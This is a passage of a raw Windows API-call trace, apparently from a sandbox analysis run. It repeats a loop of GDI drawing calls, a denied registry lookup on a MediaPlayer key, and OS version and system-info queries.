[0017.824] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.824] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.824] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.824] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.824] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.824] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5d04027d [0017.824] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x67040713 [0017.824] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ded [0017.824] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dee [0017.824] CombineRgn (hrgnDst=0x1040ded, hrgnSrc1=0x5d04027d, hrgnSrc2=0x67040713, iMode=1) returned 1 [0017.824] CombineRgn (hrgnDst=0x1040dee, hrgnSrc1=0x5d04027d, hrgnSrc2=0x67040713, iMode=4) returned 2 [0017.824] CreateSolidBrush (color=0xff) returned 0x2100dec [0017.824] CreateSolidBrush (color=0xff0000) returned 0x1100def [0017.824] DeleteObject (ho=0x1100def) returned 1 [0017.824] DeleteObject (ho=0x67040713) returned 1 [0017.824] DeleteObject (ho=0x5d04027d) returned 1 [0017.824] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.825] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.825] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.825] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.825] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.825] BeginPath (hdc=0x0) returned 0 [0017.825] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.825] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.825] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.825] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.825] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.825] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.825] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.825] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.825] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x68040713 [0017.825] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5e04027d [0017.825] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df0 [0017.825] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df1 [0017.825] CombineRgn (hrgnDst=0x1040df0, hrgnSrc1=0x68040713, hrgnSrc2=0x5e04027d, iMode=1) returned 1 [0017.825] CombineRgn (hrgnDst=0x1040df1, hrgnSrc1=0x68040713, hrgnSrc2=0x5e04027d, iMode=4) returned 2 [0017.825] CreateSolidBrush (color=0xff) returned 0x2100def [0017.825] CreateSolidBrush (color=0xff0000) returned 0x1100df2 [0017.825] DeleteObject (ho=0x1100df2) returned 1 [0017.825] DeleteObject (ho=0x5e04027d) returned 1 [0017.825] DeleteObject (ho=0x68040713) returned 1 [0017.825] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.825] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.826] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.826] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.826] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.826] BeginPath (hdc=0x0) returned 0 [0017.826] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.826] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.826] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.826] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.826] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.826] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.826] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.826] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.826] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5f04027d [0017.826] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x69040713 [0017.826] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df3 [0017.826] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df4 [0017.826] CombineRgn (hrgnDst=0x1040df3, hrgnSrc1=0x5f04027d, hrgnSrc2=0x69040713, iMode=1) returned 1 [0017.826] CombineRgn (hrgnDst=0x1040df4, hrgnSrc1=0x5f04027d, hrgnSrc2=0x69040713, iMode=4) returned 2 [0017.826] CreateSolidBrush (color=0xff) returned 0x2100df2 [0017.826] CreateSolidBrush (color=0xff0000) returned 0x1100df5 [0017.826] DeleteObject (ho=0x1100df5) returned 1 [0017.826] DeleteObject (ho=0x69040713) returned 1 [0017.826] DeleteObject (ho=0x5f04027d) returned 1 [0017.826] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.826] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.827] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.827] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.827] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.827] BeginPath (hdc=0x0) returned 0 [0017.827] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.827] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.827] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.827] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.827] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.827] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.827] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.827] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.827] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6a040713 [0017.827] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6004027d [0017.827] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df6 [0017.827] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df7 [0017.827] CombineRgn (hrgnDst=0x1040df6, hrgnSrc1=0x6a040713, hrgnSrc2=0x6004027d, iMode=1) returned 1 [0017.827] CombineRgn (hrgnDst=0x1040df7, hrgnSrc1=0x6a040713, hrgnSrc2=0x6004027d, iMode=4) returned 2 [0017.827] CreateSolidBrush (color=0xff) returned 0x2100df5 [0017.827] CreateSolidBrush (color=0xff0000) returned 0x1100df8 [0017.827] DeleteObject (ho=0x1100df8) returned 1 [0017.827] DeleteObject (ho=0x6004027d) returned 1 [0017.827] DeleteObject (ho=0x6a040713) returned 1 [0017.827] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.827] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.827] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.828] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.828] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.828] BeginPath (hdc=0x0) returned 0 [0017.828] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.828] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.828] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.828] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.828] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.828] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.828] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.828] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.828] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6104027d [0017.828] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6b040713 [0017.828] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df9 [0017.828] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dfa [0017.828] CombineRgn (hrgnDst=0x1040df9, hrgnSrc1=0x6104027d, hrgnSrc2=0x6b040713, iMode=1) returned 1 [0017.828] CombineRgn (hrgnDst=0x1040dfa, hrgnSrc1=0x6104027d, hrgnSrc2=0x6b040713, iMode=4) returned 2 [0017.828] CreateSolidBrush (color=0xff) returned 0x2100df8 [0017.828] CreateSolidBrush (color=0xff0000) returned 0x1100dfb [0017.828] DeleteObject (ho=0x1100dfb) returned 1 [0017.828] DeleteObject (ho=0x6b040713) returned 1 [0017.828] DeleteObject (ho=0x6104027d) returned 1 [0017.828] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.828] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.828] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.828] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.828] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.828] BeginPath (hdc=0x0) returned 0 [0017.829] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.829] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.829] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.829] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.829] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.829] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.829] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.829] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.829] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6c040713 [0017.829] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6204027d [0017.829] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dfc [0017.829] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dfd [0017.829] CombineRgn (hrgnDst=0x1040dfc, hrgnSrc1=0x6c040713, hrgnSrc2=0x6204027d, iMode=1) returned 1 [0017.829] CombineRgn (hrgnDst=0x1040dfd, hrgnSrc1=0x6c040713, hrgnSrc2=0x6204027d, iMode=4) returned 2 [0017.829] CreateSolidBrush (color=0xff) returned 0x2100dfb [0017.829] CreateSolidBrush (color=0xff0000) returned 0x1100dfe [0017.829] DeleteObject (ho=0x1100dfe) returned 1 [0017.829] DeleteObject (ho=0x6204027d) returned 1 [0017.829] DeleteObject (ho=0x6c040713) returned 1 [0017.829] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.829] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.829] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.829] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.829] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.829] BeginPath (hdc=0x0) returned 0 [0017.829] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.829] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.829] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.829] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.829] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.830] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.830] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.830] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.830] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6304027d [0017.830] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6d040713 [0017.830] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dff [0017.830] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e00 [0017.830] CombineRgn (hrgnDst=0x1040dff, hrgnSrc1=0x6304027d, hrgnSrc2=0x6d040713, iMode=1) returned 1 [0017.830] CombineRgn (hrgnDst=0x1040e00, hrgnSrc1=0x6304027d, hrgnSrc2=0x6d040713, iMode=4) returned 2 [0017.830] CreateSolidBrush (color=0xff) returned 0x2100dfe [0017.830] CreateSolidBrush (color=0xff0000) returned 0x1100e01 [0017.830] DeleteObject (ho=0x1100e01) returned 1 [0017.830] DeleteObject (ho=0x6d040713) returned 1 [0017.830] DeleteObject (ho=0x6304027d) returned 1 [0017.830] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.830] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.830] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.830] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.830] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.830] BeginPath (hdc=0x0) returned 0 [0017.830] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.830] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.830] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.830] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.830] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.830] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.831] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.831] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.831] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6e040713 [0017.831] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6404027d [0017.831] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e02 [0017.831] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e03 [0017.831] CombineRgn (hrgnDst=0x1040e02, hrgnSrc1=0x6e040713, hrgnSrc2=0x6404027d, iMode=1) returned 1 [0017.831] CombineRgn (hrgnDst=0x1040e03, hrgnSrc1=0x6e040713, hrgnSrc2=0x6404027d, iMode=4) returned 2 [0017.831] CreateSolidBrush (color=0xff) returned 0x2100e01 [0017.831] CreateSolidBrush (color=0xff0000) returned 0x1100e04 [0017.831] DeleteObject (ho=0x1100e04) returned 1 [0017.831] DeleteObject (ho=0x6404027d) returned 1 [0017.831] DeleteObject (ho=0x6e040713) returned 1 [0017.831] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.831] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.831] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.831] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.831] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.831] BeginPath (hdc=0x0) returned 0 [0017.831] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.831] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.831] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.831] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.831] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.831] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.831] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.832] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.832] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6504027d [0017.832] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6f040713 [0017.832] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e05 [0017.832] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e06 [0017.832] CombineRgn (hrgnDst=0x1040e05, hrgnSrc1=0x6504027d, hrgnSrc2=0x6f040713, iMode=1) returned 1 [0017.832] CombineRgn (hrgnDst=0x1040e06, hrgnSrc1=0x6504027d, hrgnSrc2=0x6f040713, iMode=4) returned 2 [0017.832] CreateSolidBrush (color=0xff) returned 0x2100e04 [0017.832] CreateSolidBrush (color=0xff0000) returned 0x1100e07 [0017.832] DeleteObject (ho=0x1100e07) returned 1 [0017.832] DeleteObject (ho=0x6f040713) returned 1 [0017.832] DeleteObject (ho=0x6504027d) returned 1 [0017.832] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.832] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.832] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.832] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.832] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.832] BeginPath (hdc=0x0) returned 0 [0017.832] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.832] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.832] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.832] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.832] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.832] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.832] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.832] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.833] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x70040713 [0017.833] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6604027d [0017.833] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e08 [0017.833] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e09 [0017.833] CombineRgn (hrgnDst=0x1040e08, hrgnSrc1=0x70040713, hrgnSrc2=0x6604027d, iMode=1) returned 1 [0017.833] CombineRgn (hrgnDst=0x1040e09, hrgnSrc1=0x70040713, 